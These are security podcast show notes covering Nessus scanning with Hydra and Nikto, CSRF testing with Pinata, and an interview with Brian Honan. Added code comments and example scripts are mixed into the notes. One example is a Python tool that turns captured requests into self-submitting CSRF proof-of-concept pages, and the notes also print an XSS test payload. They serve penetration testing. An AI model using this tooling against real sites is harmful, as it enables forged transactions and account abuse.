Episode214

From Paul's Security Weekly


Episode Media

MP3 pt. 1

MP3 pt. 2

Sponsors & Announcements

"And now from the dark corners of the Internet, where the exploits run wild, packets get sniffed, and the beer flows steady, it's Security Weekly!"

"Sponsored by Tenable Network Security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the world's best vulnerability scanner. Tenable's Security Center extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable – Unified Security Monitoring!"

"Core Security Technologies, helping you penetrate your network. Now version 10.5, full of Jive! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the world's best penetration testing tool."

"Cenzic, create a Hailstorm for your web applications! Sign up for a free trial of the Hailstorm software or scan remotely with their new online service to keep your web applications in check."

"And Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!"


Security Weekly - Episode 214 - For Thursday October 7th, 2010.

  • Announcing Hack3rcon! The con will take place on Oct 23-24, 2010 at the Charleston Civic Center, alongside CharCon, a gaming conference that will interest many of you as well. Tickets are $40 for the whole weekend.
  • Mark Baggett teaches SANS 504 during SANS San Antonio for 6 days. Come learn Hacker Techniques, Exploits & Incident Handling! November 13th through 20th.

Tech Segment: Paul's Nessus Scanning VM

I've been working on updating my Nessus scanning VM that I use for the advanced Nessus course. There are some tips and tricks I had to use in order to get third-party tools such as Nikto and Hydra working. Nessus has plugins that are wrappers for these tools. I like to use Hydra because it lets you upload custom username and password dictionaries. My suggestion for people is to use a small, custom username and password dictionary for Nessus scanning. Nessus contains plugins that will test for certain default or easily guessable passwords; however, Hydra lets you upload custom ones. Keep it small though, as it will add time to the Nessus scan. Nikto is also nice, as it will test web applications for some different stuff.

Step 1: Failed Ubuntu Upgrade

I am running Ubuntu 9.10. I attempted an upgrade to 10.10, starting by prepping:

  • Take a snapshot
  • apt-get update and upgrade
  • reboot for kernel upgrade
  • change package repos
  • Do another update and upgrade

The upgrade completed, and I got a horrible error:

aptitude install procps
aptitude: symbol lookup error: /usr/lib/libstdc++.so.6: undefined symbol: _ZNSt7num_getIcSt19istreambuf_iteratorIcSt11char_traitsIcEEE2idE, version GLIBCXX_3.4

Thank God for the snapshot! I reversed the upgrade and will wait. 10.10 is stable in 3 days, so hopefully an upgrade at a later date will go better.

Step 2: Hydra

A new version of Hydra has been released, so of course I want the latest:

  • Download Hydra 5.8
  • It is important to install in /usr/local so Nessus can find it:
 ./configure --prefix=/usr/local --disable-xhydra

Thanks to one of my students, Gebhard, for these fixes to the Makefile, which are needed to compile Hydra successfully on 9.10:

-XLIBS= -lssl -lncp -lpq -lsvn_client-1 -lapr-0 -laprutil-0 -lsvn_client-1 -lapr-0 -laprutil-0 -lssh -lcrypto
+XLIBS= -lssl -lncp -lpq -lsvn_client-1 -lapr-1 -laprutil-1 -lsvn_client-1 -lssh -lcrypto
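Review bot: the new XLIBS line still names -lsvn_client-1 twice (once after -lpq and again after -laprutil-1); the second copy is left over from the duplicated group that this change otherwise removes and can be dropped, giving `XLIBS= -lssl -lncp -lpq -lsvn_client-1 -lapr-1 -laprutil-1 -lssh -lcrypto`. The duplicate is harmless to the linker, but keeping the list clean makes it obvious that only the apr-1 generation is being linked.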

-XIPATHS= -I/usr/include/subversion-1 -I/usr/include/subversion-1
+XIPATHS= -I/usr/local/subversion/include/subversion-1/ -I/usr/include -I/usr/local/include -I/usr/local/subversion/include/apr-0/
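Review bot: the include path and the link flags now disagree on the APR generation: XIPATHS adds -I/usr/local/subversion/include/apr-0/ while the XLIBS line above links -lapr-1 -laprutil-1, so the build compiles against apr-0 headers and links the apr-1 library, which can compile cleanly and then misbehave at runtime. Point XIPATHS at the apr-1 headers that match the link line (on Ubuntu the libapr1-dev package installs them under /usr/include/apr-1.0). Note also that both new -I entries assume a from-source Subversion under /usr/local/subversion; with the distro libsvn-dev package, the original -I/usr/include/subversion-1 is the correct path and should be kept.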
  • now build it and install it:
# make
# make install

Now you can upload dictionaries and use Nessus:

[Screenshot: HydraNessus.png]

Make sure you reduce the number of threads!

Step 3: Nikto

  • Download Nikto and install it under /opt/nikto:
wget http://cirt.net/nikto/nikto-2.1.3.tar.gz
 tar zxvf nikto-2.1.3.tar.gz 
 cd nikto-2.1.3
 mkdir /opt/nikto
 cp -r * /opt/nikto/

Edit nikto.pl and change the path:

$NIKTO{'configfile'}  = "/opt/nikto/nikto.conf";    ### Change this line if it's having trouble finding it
  • Edit /etc/profile
export PATH=$PATH:/opt/nikto:/opt/nessus/bin:/opt/nessus/sbin
  • Re-compile and re-index the plugins:
/opt/nessus/sbin/nessusd -R
  • restart Nessus:
/etc/init.d/nessusd restart

And then you will see it in the preferences:

[Screenshot: NiktoNessus.png]
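The Nikto steps above as one re-runnable script, added here as an example (it is not a script from the page or from the Nessus or Nikto projects). It makes the two file edits from the text with a check after each: the configfile line in nikto.pl must actually contain the new path afterwards, and the export PATH line is only appended to the profile if it is not already there, so running the setup twice does not grow PATH. It assumes GNU sed and grep, the same download URL and install paths as the text, and nessusd under /opt/nessus; the installer only runs when NIKTO_SETUP_RUN=1 is set, so the helpers can be sourced and tried on a copy of nikto.pl first.

```shell
#!/bin/sh
# Added example (not the page's own script): the Nikto-for-Nessus setup from the
# text as one script, with each file edit verified after it is made.
# Assumptions: GNU sed/grep, the download URL and paths used in the text, and
# nessusd installed under /opt/nessus.

NIKTO_VER="2.1.3"
NIKTO_URL="http://cirt.net/nikto/nikto-${NIKTO_VER}.tar.gz"
NIKTO_HOME="/opt/nikto"
PROFILE="/etc/profile"
NESSUS_SBIN="/opt/nessus/sbin"
# Same PATH addition as the text, as one chain so it can be checked as a unit.
PATH_CHAIN="/opt/nikto:/opt/nessus/bin:/opt/nessus/sbin"

# set_nikto_configfile <nikto.pl> <absolute path to nikto.conf>
# Rewrites the $NIKTO{'configfile'} assignment (keeping any trailing comment)
# and fails unless the new path is really present afterwards. '|' is the sed
# delimiter so the slashes in the path need no escaping; the path itself must
# therefore not contain '|' or '&'.
set_nikto_configfile() {
    script="$1"; conf="$2"
    [ -f "$script" ] || { echo "set_nikto_configfile: no such file: $script" >&2; return 1; }
    tmp="$script.tmp.$$"
    sed "s|^\(\\\$NIKTO{'configfile'}[[:space:]]*=[[:space:]]*\)\"[^\"]*\";|\1\"$conf\";|" "$script" > "$tmp" \
        && mv "$tmp" "$script"
    grep -q "^\\\$NIKTO{'configfile'}[[:space:]]*=[[:space:]]*\"$conf\";" "$script"
}

# ensure_path_entry <profile file> <dir or dir chain>
# Appends 'export PATH=$PATH:<dir>' unless an export PATH line in the file
# already names it, so the setup is safe to re-run.
ensure_path_entry() {
    profile="$1"; dir="$2"
    [ -f "$profile" ] || : > "$profile"
    if grep '^export PATH=' "$profile" | grep -qF -- "$dir"; then
        return 0
    fi
    printf 'export PATH=$PATH:%s\n' "$dir" >> "$profile"
}

# The whole procedure from the text, in order.
install_nikto_for_nessus() {
    set -e
    wget -O "nikto-${NIKTO_VER}.tar.gz" "$NIKTO_URL"
    tar zxvf "nikto-${NIKTO_VER}.tar.gz"
    mkdir -p "$NIKTO_HOME"
    cp -r "nikto-${NIKTO_VER}"/* "$NIKTO_HOME"/
    set_nikto_configfile "$NIKTO_HOME/nikto.pl" "$NIKTO_HOME/nikto.conf"
    ensure_path_entry "$PROFILE" "$PATH_CHAIN"
    # Re-index the plugins so the Nikto wrapper is picked up, then restart.
    "$NESSUS_SBIN/nessusd" -R
    /etc/init.d/nessusd restart
}

# Only run the installer when asked, so the helpers can be sourced and tested.
if [ "${NIKTO_SETUP_RUN:-0}" = "1" ]; then
    install_nikto_for_nessus
fi
```

After the restart, the Nikto preference page should appear in the scan policy as shown in the screenshot; if it does not, the usual cause is that nikto.pl is not on the PATH of the user nessusd runs as, which the ensure_path_entry check above does not cover.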

Tech Segment 2!!: XSRF Scanning with Pinata!

One of the harder issues to test for is Cross Site Request Forgery. The reason it is so hard to test for is that it is not a simple stimulus-and-response game. For example, if I put ' into a field and I get a 500 error, I know there may be some level of SQLi at play. The same holds true for Cross Site Scripting. If I send in <IMG SRC="javascript:alert('XSS');"> and it is reflected to my browser, I am pretty sure there is XSS.

But how can you easily detect CSRF? The simple answer is you can't. But that is a good thing. In fact, it is wonderful. Here is why this is so good for all of us: it won't be automated in the near future. Why? Well, it requires the tester to have some level of understanding about how the application works. You need to see how an application does things like adding a user, transferring funds, or opening ports in a firewall. What are the requests that create these conditions and, with many applications, where are the indications that the request was successful? Sometimes it is easy. Sometimes the page will respond automatically. Other times... Well, other times you may need to navigate to a completely different part of the application to see if the request was successful. The beautiful thing is that this is exactly what you should be doing for logic testing as well.

Since many automated tools cannot do this well, how can we approach testing CSRF? First, find those sections of an application that deal with transactions. Next, make those requests through a proxy where they can be intercepted. Finally, create a page that, when visited, triggers the same request. Pinata is an excellent tool to help with this process. Well... at least with the last step. With Pinata you copy the request that was made into a file, then Pinata will convert it into a .html file that you can load and see if the attack launches.

For the business logic, you still need to find that on your own.

-strandjs (Fr. John)
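The last step of the process described above, a captured request turned into a page that replays it, as an added example in Python. This is not Pinata's code and not code from the segment; it is a small stand-in that shows what such a converter has to get right. It assumes the request was copied out of the proxy as a raw HTTP/1.x request with a Host header, handles GET and form-encoded POST (the two shapes a plain HTML form can reproduce) and refuses anything else rather than guessing, and flags parameter names that look like anti-CSRF tokens, since a replay that still works with a copied token says the server is not validating it. The sample transfer request and the parameter-name hints are constructed for the example.

```python
"""Added example (not Pinata's code or the page's): build a self-submitting
CSRF proof-of-concept page from a proxy-captured HTTP request."""

import html
from urllib.parse import parse_qsl, urlsplit

# Parameter names that usually carry an anti-CSRF value (constructed list).
# If one is present, the replay proves something only because the server did
# not check it; that is a finding of its own, so the page says so.
TOKEN_HINTS = ("token", "csrf", "xsrf", "nonce", "authenticity")

# Constructed sample: a funds transfer as an intercepting proxy would show it.
SAMPLE_REQUEST = (
    "POST /account/transfer HTTP/1.1\r\n"
    "Host: bank.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: session=abc123\r\n"
    "Content-Length: 39\r\n"
    "\r\n"
    "to=attacker&amount=1000&memo=rent+money"
)


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "host" not in headers:
        raise ValueError("request has no Host header; cannot build an absolute action URL")
    return {"method": method.upper(), "target": target, "headers": headers, "body": body}


def form_parameters(req: dict, scheme: str):
    """Return (action URL, [(name, value), ...], form method) for a replayable request."""
    url = f"{scheme}://{req['headers']['host']}{req['target']}"
    if req["method"] == "GET":
        # A GET form replaces the action's query string with its own fields, so
        # the query has to move into hidden inputs instead of staying on the URL.
        parts = urlsplit(url)
        return parts._replace(query="").geturl(), parse_qsl(parts.query, keep_blank_values=True), "get"
    if req["method"] == "POST":
        ctype = req["headers"].get("content-type", "")
        if not ctype.startswith("application/x-www-form-urlencoded"):
            raise ValueError(f"a plain HTML form cannot send Content-Type {ctype!r}; "
                             "JSON or multipart bodies need a different PoC")
        return url, parse_qsl(req["body"], keep_blank_values=True), "post"
    raise ValueError(f"no form-based replay for method {req['method']}")


def suspected_tokens(params) -> list:
    """Names of parameters that look like anti-CSRF tokens."""
    return [n for n, _ in params if any(h in n.lower() for h in TOKEN_HINTS)]


def csrf_poc(raw: str, scheme: str = "http") -> str:
    """Render the captured request as a page that submits it as soon as it loads."""
    req = parse_request(raw)
    action, params, method = form_parameters(req, scheme)
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(n, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for n, v in params
    )
    tokens = suspected_tokens(params)
    warning = ""
    if tokens:
        warning = (f"<!-- WARNING: {', '.join(tokens)} looks like an anti-CSRF token; "
                   "if this page still works, the server is not validating it. -->\n")
    return (
        "<!DOCTYPE html>\n"
        "<html>\n"
        "<!-- Load this while logged into the target in the same browser. The browser\n"
        "     attaches the session cookie itself; if the action completes, the endpoint\n"
        "     accepts forged cross-site requests. -->\n"
        f"{warning}"
        '<body onload="document.forms[0].submit()">\n'
        f'  <form action="{html.escape(action, quote=True)}" method="{method}">\n'
        f"{inputs}\n"
        "  </form>\n"
        "</body>\n"
        "</html>\n"
    )


if __name__ == "__main__":
    print(csrf_poc(SAMPLE_REQUEST))
```

Save the output as a .html file and open it in the browser that holds the victim session; the success check is the one the segment describes, which may mean navigating elsewhere in the application to see whether the transfer, user or firewall rule actually appeared.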


Guest Interview: Brian Honan

Mr. Honan is the European editor for SANS NewsBites and founded the Irish Reporting and Information Security Service, Ireland's first national CSIRT (Computer Security Incident Response Team). He is also the author of "ISO 27001 in a Windows Environment".


  1. How did you get your start in information security?
  2. What is ISO 27001 and why is it important?
  3. Do standards help us, or do they just set a low bar for "security" and give people a false impression that they are "secure"?
  4. What is the function of a CERT? How did you come to start the first CSIRT in Ireland?
  5. What are the benefits to a country-wide CERT?
  6. Can companies benefit from having their own CERT?
  7. What can we teach CS students about security? How do we get them to understand security?
  8. What are your thoughts on mandatory breach disclosure? Doesn't it just hurt companies to disclose a breach? What if it doesn't affect customers? How do you enforce such a law if the company handles it internally?
  9. IRISSCERT is running its annual cyber crime conference in Dublin - what's being planned? Rumor is free Guinness?

Background notes on Mr. Honan:

  • Day job is running his own consulting firm BH Consulting, providing ISO 27001:2005 advice & general security guidance
  • Teaches Masters in Computer Science in Information Security at University College Dublin
  • Works with ENISA (the European Network and Information Security Agency) and has assisted them in producing some of their white papers on security, in particular on the security awareness side of things.
  • blogs at Security Watch and contributes to the Infosecurity Network site and also to the strategy section of Irish online publication called Silicon Republic
  • COO for the Common Assurance Maturity Model which is a security/assurance standard being developed to provide vendors and customers with a transparent means of determining the security of the service offering. It is primarily aimed at cloud providers but can be applied to any IT service provider be they external or internal to an organisation. They plan to go into pilot with the model soon with a view to releasing it later this year/early next year.
  • Campaigned for mandatory breach disclosure laws to be introduced in Ireland and made submissions to the government's working group on the issue, which introduced a code of practice for mandatory breach disclosure in Ireland (the first country within the EU to do so). http://www.dataprotection.ie/viewdoc.asp?DocID=1085&m=f
  • Mr. Honan's Linkedin profile

Stories For Discussion

  1. Evil - [Larry] I'm really loving social network APIs. With them we have the ability to search for all sorts of things about people, this one for their phone numbers. This could get interesting.
  2. World's Sexiest Hacker - [Paul Asadoorian] - Is she? She got busted as part of the Zeus botnet. Yea, it was a slow week for stories! I still think that Larry is the sexiest hacker in the world, Dennis Brown may be a close second.
  3. Topic - "Does NAC work well enough?" - So here's the thing: as pen testers, we know that NAC doesn't slow us down. If we have physical access we can spoof a MAC address, unplug a printer and use its MAC address, or with VoIP use VoIP Hopper to jump VLANs. However, from a defensive standpoint, having NAC helps keep laptops from coming back on the network and prevents contractors and vendors from plugging in infected systems. To that point, does segmentation really work effectively? While you can put all the HR systems on one segment, is that effort really worth it? I tend to believe that putting systems in one segment just moves the problem around. Different segments need to talk to each other, and it's not that hard to figure out what's allowed and get around it. A DMZ, I believe, is a good thing, but systems want to talk to each other. People will open holes, so is all the firewall administration worth the little protection it provides? I think in security we tend to move the problem around instead of fixing it. I'm saying put effort into patching your systems and monitoring your logs, rather than moving the problem around.
  4. Man in the mobile - [Paul Asadoorian] - Bleh, too many buzzwords. However, two-factor authentication that sends you a TXT message doesn't work so well if an attacker pwns your phone. So, do better.
  5. Hacking Tire Pressure Sensors - [Paul Asadoorian] - "The wireless sensors, compulsory in new automobiles in the US since 2008, can be used to track vehicles or feed bad data to the electronic control units (ECU), causing them to malfunction." I think hacking cars is neat, but unless there is money to be made, attackers will just yawn. Maybe there will be some pranks, but I don't see this being a huge concern.
  6. Tricking folks into security services? - [Larry] - I wonder how something like this would go over in our industry? I have a feeling not very well. Although I think for a parallel, in our industry if we are able to sneak something in like this, we're in, not just with trickery.
  7. iPhone app data - [Larry] - Buyer beware, I guess? But how would the average consumer ever know? Phone UDIDs (Unique IDs) can be grabbed by the API and sent by an app with other personal information, although it is "prohibited". Some even in cleartext...
  8. Dlink Video FAIL! - [Paul Asadoorian] - So fail, command injection, root/admin hard coded.

Other Stories of Interest